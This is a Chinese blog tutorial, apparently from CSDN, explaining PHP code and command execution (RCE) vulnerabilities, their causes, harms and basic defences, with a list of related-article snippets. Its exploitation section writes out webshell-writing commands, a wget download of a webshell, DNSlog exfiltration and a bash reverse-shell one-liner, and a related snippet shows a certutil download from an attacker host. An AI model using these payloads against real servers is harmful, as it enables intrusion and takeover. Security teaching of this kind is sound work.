一篇文章教你学会RCE代码&命令执行漏洞

已于 2024-06-26 15:06:13 修改
阅读量257 收藏 3
点赞数 4
分类专栏: TOP10漏洞 文章标签: 安全 开发语言 网络安全 web安全 面试
于 2024-06-22 13:27:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a770067334/article/details/139881210
版权

Ⅰ、代码&命令执行

目录

Ⅰ、代码&命令执行

1. 漏洞成因

2. 利用

3. 漏洞危害

4. 防御

Ⅱ、命令执行 

1. 命令执行漏洞描述

2. 漏洞成因

3. 常用的命令执行函数

 Ⅲ、代码执行漏洞

1. 代码执行漏洞描述

2. 漏洞成因

3. 常用的代码执行函数

1. 漏洞成因

对于开发者:

  1. 后端人员为了方便管理网站
  2. 某些网站功能需要,把命令执行的这个接口交给了用户使用。

对于攻击者

1.用户可控变量

2.漏洞函数

2. 利用

1.写webshell

echo "" > webshell.php

2.外部下载

wget 网址 -O webshell.php

3.命令外带

需要用到DNSlog,DNSLog Platform

4.反弹shell

bash -i >& /dev/tcp/IP/port 0>&1

5.写shell

fputs(fopen("shell.php","a"),"");

3. 漏洞危害

代码执行危害:根据服务器语言不同,可导致PHP、Java、Python等任意代码执行

命令执行危害:导致任意系统命令执行(getshell)

  1. 继承web服务器的权限,去执行命令,读写文件。获取敏感文件
  2. 反弹shell
  3. 获取敏感数据文件
  4. 提权,写入恶意文件getshell。

4. 防御

  1. 尽量不要使用命令执行函数
  2. 用白名单将用户可输入函数写死(白名单,只能ping)
  3. 用正则表达式对用户输入进行过滤
  4. 使用WAF

Ⅱ、命令执行 

1. 命令执行漏洞描述

命令执行(Command Injection)指在某些开发需求中,需要引入对系统本地命令(比如system)的支持来完成某些特定的功能。当开发未对用户传入的参数进行严格的校验、过滤时,则很有可能会产生命令注入。攻击者使用命令注入来执行系统终端命令,直接获取服务器控制权限。

2. 漏洞成因

  • 用户可控变量
  • 漏洞函数

3. 常用的命令执行函数

system(“whoami”)      #执行外部程序,并且显示输出 
exec(“whoami”)        #echo exec(“whoami”)执行一个外部程序并输出结果
shell_exec(“whoami”)  #echo shell_exec(“whoami”)通过 shell 执行命令并将完整的输出以字符串的方式返回并输出
passthru(“whoami”)    #执行外部程序并且显示原始输出
反引号``			  #echo `whomi`执行whomi并输出结果

 Ⅲ、代码执行漏洞

1. 代码执行漏洞描述

代码执行(Remote Code Execute)应用程序在调用一些能够将字符串转换为代码的函数(如PHP中的eval)时,没有考虑用户是否控制这个字符串,将造成代码执行漏洞。大部分都是根据源代码判断代码执行漏洞。

2. 漏洞成因

  • 用户可控变量
  • 漏洞函数

3. 常用的代码执行函数

eval(system(“whoami”))		eval()函数 #把字符串作为PHP代码执行 
assert(system("whoami"))	 #assert()函数把括号内的字符串当做PHP代码来执行。
call_user_func('assert',$_GET["cmd"])  #第一个参数 assert是被调用的回调函数,其余参数是回调函数的参数。
call_user_func_array('assert',[$_GET["cmd"]]);    #调用回调函数,并把一
个数组参数作为回调函数的参数。


?c=echo 123;
?c=echo 'hsvjash';
?c=system('phpinfo()');

网安ctfer
关注
专栏目录
网络安全RCE漏洞讲解、绕过方式及实例介绍
等风来
05-13 1271
4、passthru():能将字符串作为OS命令执行,只调用命令不返回任何结果,但把命令的运行结果原样输出到标准输出设备上;6、call_user_func_array():回调函数,第一个参数为函数名,第二个参数为函数参数的数组。2、exec():能将字符串作为OS命令执行,但是只返回执行结果的最后一行(约等于无回显)5、call_user_func():回调函数,第一个参数为函数名,第二个参数为函数的参数。1、system():能将字符串作为OS命令执行,且返回命令执行结果;
〖工具〗log4Shell核弹级漏洞复现&Ladon批量检测
K8哥哥
12-18 4702
title: 〖工具〗log4Shell核弹级漏洞复现&Ladon批量检测 comments: true toc: true categories: exp tags: Log4j2 abbrlink: log4shell date: 2021-12-16 19:24:00 img: https://img-blog.csdnimg.cn/20210117163103552.jpg 漏洞简介 Apache Log4j2是一款优秀的Java日志框架。近日,漏洞银行安全团队注意到了Ap.
RCE无回显漏洞利用
qq_32947907的博客
01-22 1115
除了上面的一些常见的方式以外,还有其它的如ICMP协议外带等等。参考链接带外攻击OOB(RCE无回显骚思路总结)-腾讯云开发者社区-腾讯云不积跬步,无以至千里;不积小流,无以成江河。
Pikachu漏洞靶场 RCE(远程命令执行/代码执行)
柠檬i的博客
04-05 1573
RCE(remote command/code execute)概述 RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。 远程系统命令执行 一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口
Web漏洞-RCE代码命令执行漏洞全解-web漏洞产生的原理及条件-墨者靶场详解
ran的博客
04-03 2034
指用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令,可能会允许攻击者通过改变 $PATH 或程序执行环境的其他方面来执行一个恶意构造的代码。在Web应用中有时候程序员为了考虑灵活性、简洁性,会在代码调用代码命令执行函数去处理。比如当应用在调用一些能将字符串转化成代码的函数时,没有考虑用户是否能控制这个字符串,将造成代码执行漏洞。墨者靶场详解。
无数字字母webshell之上传临时文件RCE
snowlyzz的博客
08-11 946
新姿势,上传临时文件rce
Web安全基础学习:RCE远程命令执行之基础命令执行
最新发布
qq_51862722的博客
06-25 843
命令执行漏洞:指攻击者通过注入恶意命令执行非预期的操作;简单来说就是没有对用户输入的内容充分的验证或过滤,而直接带入到命令执行函数中当成系统化命令执行
网安入门21——RCE(绕过方法梳理)
m0_61499194的博客
10-04 390
所以前面的“IFS”可以改为 “$IFS$9”。less:和more类似,但其优点可以往前翻页,而且进行可以搜索字符。9表示当前系统shell进程的第九个参数,通常是一个空字符。tac:从最后一行倒序显示内容,并将所有内容输出。cat:由第一行开始显示内容,并将所有内容输出。more:根据窗口大小,一页一页的现实文件内容。是Linux存在的环境变量,是内部字段分隔符。反引号可以将ls列出的内容全部cat输出一遍。nl:类似于cat -n,显示时输出行号。目标是获取flag.txt的内容。
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
weixin_46280935的博客
09-10 5583
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏
一个基于SpringBoot开发的RBAC系统,非常适合新手入门JavaWeb代码审计实战的系统,长文警告,要好好学习。
Power7089的博客
08-08 3168
一个基于SpringBoot开发的RBAC系统,非常适合新手入门JavaWeb代码审计的系统,长文警告,要好好学习哦。
追洞计划 | Gitlab CI Lint API未授权 SSRF漏洞(CVE-2021-22214)
Ms08067安全实验室
06-22 6150
文章来源|MS08067 Web安全知识星球本文作者:Taoing(Web安全攻防合伙人) GitLab 是一个用于仓库管理系统的开源项目,使用Git作为代码管理工具,并在此基础上搭建起来...
红队系列-网络安全知识锦囊(持续更新)
aming小老弟
11-09 1245
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
RCE命令注入
m0_75178803的博客
06-18 573
a=certutil -urlcahce -split -f http://192.168.160.135(攻击机)/1.txt 2.php。certutil -urlcache -split -f http://192.168.160.135(攻击机)/1.txt 2.php。在靶机(192.168.31.187)下的1.php查看上传的攻击机(192.168.160.135)中的2.php文件。漏洞的起源是在开发的过程中带有输入-执行功能的系统时,由于输入过滤不严谨,导致的命令产生了注入。
RCE学习
oyf3085227433的博客
05-02 1218
学习总结一下rce的基础知识
08-(RCE命令代码执行漏洞
qq_56414082的博客
03-28 931
RCE英文全称:remote command/code execute(远程命令/代码执行漏洞)分为远程命令执行ping和远程代码执行eval。
RCE(远程命令代码执行漏洞
weixin_42393944的博客
08-10 551
1.理解:可以直接让攻击者向后台服务器远程注入操作命令或者代码,从而控制后台系统 2.区别: 远程命令执行:直接调用操作系统命令 远程代码执行:靠执行代码调用操作系统命令 3.windows系统命令拼接 <1>"|":管道符,前面命令标准输出,后面命令标准输入 <2>"&": A&B,先运行A后运行B <3>"||": A||B ,运行A命令,若A失败则运行B命令 <4&gt...
RCE学习(一)
Dug123456_的博客
05-01 947
RCE:远程命令/代码执行漏洞,简称为RCE漏洞,可以直接向服务器后台远程注入操作系统的命令或者代码,从而拿到服务器后台的权限。可选,用来存放搜索结果,$matches[0]存放所有匹配的字符串,$matches[1]用来存放第一个匹配的字符串,$matches[2]用来存放第三个匹配的字符串,以此类推。管道输出符|:前面命令的输出作为后面命令的输入,把前面命令的结果作为后面命令的参数;dir /ah /os //显示当目下隐藏的文件和目录,按文件大小从小到大排序。
RCE(远程命令/代码执行)
Massimo__JAVA的博客
08-04 513
系统对用户输入的参数过滤不严,导致用户可以输入&、|、||等命令连接符,拼接并执行命令
RCE(命令执行)总结
leekos的博客,分享web安全相关知识~
01-05 2908
RCE(命令执行)总结
深信服edr代码审计:远程命令执行漏洞分析(RCE
"深信服edr终端检测响应平台()存在代码审计挖掘出的远程命令执行RCE漏洞,允许攻击者执行任意系统命令。此漏洞影响版本低于3.2.21,通过搜索和分析敏感函数,如exec()等,发现 ldb_exec() 函数的自定义命令...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值